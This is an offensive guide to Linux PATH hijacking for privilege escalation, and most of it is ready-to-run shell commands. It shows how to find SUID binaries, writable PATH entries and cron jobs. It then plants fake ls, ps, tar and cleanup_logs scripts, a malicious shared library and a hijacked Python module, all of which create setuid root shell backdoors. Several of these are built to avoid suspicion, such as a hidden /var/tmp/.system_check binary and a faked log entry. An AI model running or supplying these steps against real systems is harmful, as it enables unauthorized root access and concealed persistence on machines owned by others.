Path hijacking

Understanding Path Hijacking

What Makes Path Hijacking Dangerous

Path hijacking exploits the way Linux systems resolve executable file locations. When a program calls another program without specifying the full path, the system searches through directories listed in the PATH environment variable. By manipulating this search order or placing malicious executables in writable directories within the PATH, attackers can execute arbitrary code with elevated privileges.

The Attack Principle: Exploit scenarios where:

• SUID/SGID binaries call other programs without absolute paths

• Scripts executed by privileged users reference commands without full paths

• Cron jobs run commands without absolute path specifications

• Service scripts use relative path references

Why This Works: The system searches PATH directories in order. If you can write to a directory that appears before the legitimate binary's location, your malicious binary will be executed instead.

Path Hijacking Discovery and Enumeration

Finding Vulnerable Binaries

Basic SUID/SGID Discovery:

# Find all SUID binaries
find / -type f -perm -4000 2>/dev/null

# Find all SGID binaries
find / -type f -perm -2000 2>/dev/null

# Find both SUID and SGID
find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null

# Focus on user-writable areas
find /home /tmp /var/tmp -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null

Analyzing Binary Dependencies:

# Check what commands a binary calls
strings /path/to/suid_binary | grep -E "^[a-zA-Z]"

# Look for system calls without absolute paths
strings /path/to/suid_binary | grep -v "/"

# Use strace to see runtime dependencies
strace -f -e execve /path/to/suid_binary 2>&1 | grep execve

PATH Environment Analysis:

# Check current PATH
echo $PATH

# Check PATH for writable directories
echo $PATH | tr ':' '\n' | while read dir; do [ -w "$dir" ] && echo "Writable: $dir"; done

# Find world-writable directories in PATH
for dir in $(echo $PATH | tr ':' '\n'); do
    [ -d "$dir" ] && [ -w "$dir" ] && ls -ld "$dir"
done

High-Value Path Hijacking Targets

SUID Binary Analysis

Identifying Vulnerable SUID Programs:

# Common vulnerable patterns to look for
strings /usr/bin/suid_binary | grep -E "(system|exec|popen)" -A5 -B5

# Check for relative path usage
strings /usr/bin/suid_binary | grep -E "^(ls|cat|ps|id|whoami|cp|mv)$"

# Look for shell command execution
strings /usr/bin/suid_binary | grep -E "(sh|bash|/bin/)"

Testing for Path Hijacking:

# Create test directory and modify PATH
mkdir /tmp/hijack
export PATH=/tmp/hijack:$PATH

# Create malicious binary
echo '#!/bin/bash
echo "PATH HIJACKED!"
/bin/bash -p' > /tmp/hijack/ls
chmod +x /tmp/hijack/ls

# Test if vulnerable binary uses our malicious ls
/path/to/vulnerable_suid_binary

Cron Job Path Hijacking

Cron Job Discovery:

# Check system cron jobs
cat /etc/crontab
ls -la /etc/cron.*
cat /etc/cron.d/*

# Check user cron jobs
crontab -l
ls -la /var/spool/cron/crontabs/

# Look for cron jobs with relative paths
grep -r "^[^#]*[^/]" /etc/cron* /var/spool/cron/ 2>/dev/null

Exploiting Cron Path Vulnerabilities:

# If cron job runs without absolute paths
# Example: */5 * * * * backup_script.sh

# Create malicious script in PATH
echo '#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod 4755 /tmp/rootbash' > /usr/local/bin/backup_script.sh
chmod +x /usr/local/bin/backup_script.sh

# Wait for cron execution
watch -n 1 ls -la /tmp/rootbash

Service Script Hijacking

Service Analysis:

# Check service files for relative paths
grep -r "ExecStart=" /etc/systemd/system/ | grep -v "/"
grep -r "ExecStart=" /usr/lib/systemd/system/ | grep -v "/"

# Check init scripts
grep -r "^[^#]*[a-zA-Z]" /etc/init.d/ | grep -v "/"

Exploitation Techniques

Basic Path Hijacking Exploit

Standard Exploitation Process:

# Identify vulnerable binary
strings /usr/bin/vulnerable_suid | grep -E "^(ls|ps|id|cat)$"

# Check current PATH and find writable directory
echo $PATH

# Create malicious binary in writable PATH directory
echo '#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod 4755 /tmp/rootbash' > /usr/local/bin/ls
chmod +x /usr/local/bin/ls

# Execute vulnerable binary
/usr/bin/vulnerable_suid

# Use the created rootbash
/tmp/rootbash -p

Advanced PATH Manipulation

PATH Environment Hijacking:

# Create hijack directory
mkdir /tmp/pathexploit
cd /tmp/pathexploit

# Create malicious commands
echo '#!/bin/bash
echo "Hijacked: ps"
/bin/bash -p' > ps
chmod +x ps

echo '#!/bin/bash
echo "Hijacked: ls"  
/bin/bash -p' > ls
chmod +x ls

# Export modified PATH
export PATH=/tmp/pathexploit:$PATH

# Execute vulnerable program
/path/to/vulnerable_binary

Library Path Hijacking

LD_LIBRARY_PATH Exploitation:

# Check if binary is vulnerable to library hijacking
ldd /path/to/suid_binary

# Create malicious library
echo 'void _init() {
    system("/bin/bash -p");
}' > /tmp/malicious.c

gcc -shared -fPIC -nostartfiles /tmp/malicious.c -o /tmp/malicious.so

# Set library path and execute
export LD_LIBRARY_PATH=/tmp:$LD_LIBRARY_PATH
/path/to/vulnerable_binary

Script-Based Path Hijacking

Shell Script Vulnerabilities

Identifying Vulnerable Scripts:

# Find scripts that call commands without absolute paths
find / -name "*.sh" -exec grep -l "^[^#]*[a-zA-Z]" {} \; 2>/dev/null

# Check for dangerous patterns
grep -r "system(" /usr/local/bin/ 2>/dev/null
grep -r "exec(" /usr/local/bin/ 2>/dev/null

Script Exploitation Example:

# If script contains: system("ps aux | grep something")
# Create malicious ps command
echo '#!/bin/bash
cp /bin/bash /tmp/scriptbash
chmod 4755 /tmp/scriptbash
# Call real ps to avoid suspicion
/bin/ps "$@"' > /tmp/ps
chmod +x /tmp/ps

# Modify PATH and execute script
export PATH=/tmp:$PATH
/path/to/vulnerable_script

Python Script Path Hijacking

Python Module Hijacking:

# If Python script imports modules without absolute paths
# Check Python path
python3 -c "import sys; print('\n'.join(sys.path))"

# Create malicious module in writable Python path
echo 'import os
os.system("/bin/bash -p")' > /usr/local/lib/python3.x/site-packages/subprocess.py

# Execute vulnerable Python script
python3 /path/to/vulnerable_script.py

Real-World Exploitation Examples

Example 1: SUID Binary with ps Command

Discovery:

# Find SUID binary
find /usr/bin -perm -4000 -exec strings {} \; -print | grep -B5 -A5 "^ps$"

# Identify /usr/bin/monitor calls ps without full path
strings /usr/bin/monitor | grep ps

Exploitation:

# Check PATH for writable directory
echo $PATH | tr ':' '\n' | xargs ls -ld 2>/dev/null | grep "^d.*w"

# Create malicious ps in /usr/local/bin (if writable)
echo '#!/bin/bash
cp /bin/bash /tmp/monitor_backdoor
chmod 4755 /tmp/monitor_backdoor
exec /bin/ps "$@"' > /usr/local/bin/ps
chmod +x /usr/local/bin/ps

# Execute vulnerable binary
/usr/bin/monitor

# Access backdoor
/tmp/monitor_backdoor -p

Example 2: Cron Job Exploitation

Discovery:

# Found vulnerable cron entry
cat /etc/crontab | grep backup
# */10 * * * * root cleanup_logs

Exploitation:

# Create malicious cleanup_logs script
echo '#!/bin/bash
# Create persistent backdoor
cp /bin/bash /var/tmp/.system_check
chmod 4755 /var/tmp/.system_check
# Log execution to avoid suspicion
echo "Cleanup completed: $(date)" >> /var/log/cleanup.log' > /usr/local/bin/cleanup_logs
chmod +x /usr/local/bin/cleanup_logs

# Wait for cron execution (max 10 minutes)
# Access backdoor when created
/var/tmp/.system_check -p

Example 3: Custom Application

Discovery:

# Found custom SUID application
ls -la /opt/custom/bin/backup_tool
# -rwsr-xr-x 1 root root /opt/custom/bin/backup_tool

# Check what commands it calls
strings /opt/custom/bin/backup_tool | grep -v "/"
# tar
# gzip
# rm

Exploitation:

# Create temporary hijack directory
mkdir /tmp/custom_hijack
export PATH=/tmp/custom_hijack:$PATH

# Create malicious tar command
echo '#!/bin/bash
# Create backdoor
cp /bin/bash /tmp/custom_backdoor
chmod 4755 /tmp/custom_backdoor
# Execute real tar to maintain functionality
exec /bin/tar "$@"' > /tmp/custom_hijack/tar
chmod +x /tmp/custom_hijack/tar

# Execute vulnerable application
/opt/custom/bin/backup_tool

# Use backdoor
/tmp/custom_backdoor -p

Key Operational Considerations

Success Indicators

• Writable directories found in PATH environment

• SUID/SGID binaries calling commands with relative paths

• Cron jobs executing scripts without absolute paths

• Privilege escalation achieved through path manipulation

Common Failure Points

• No writable directories in PATH

• All commands use absolute paths

• Modern systems with restricted PATH handling

• AppArmor/SELinux preventing path manipulation

Exploitation Notes

• Custom applications more likely vulnerable than system binaries

• Development environments often have relaxed PATH security

• Cron jobs frequently vulnerable to path hijacking

• Service scripts may use relative paths for configuration flexibility

Path hijacking remains a reliable privilege escalation technique, particularly effective against custom applications and in environments where PATH security is not strictly controlled.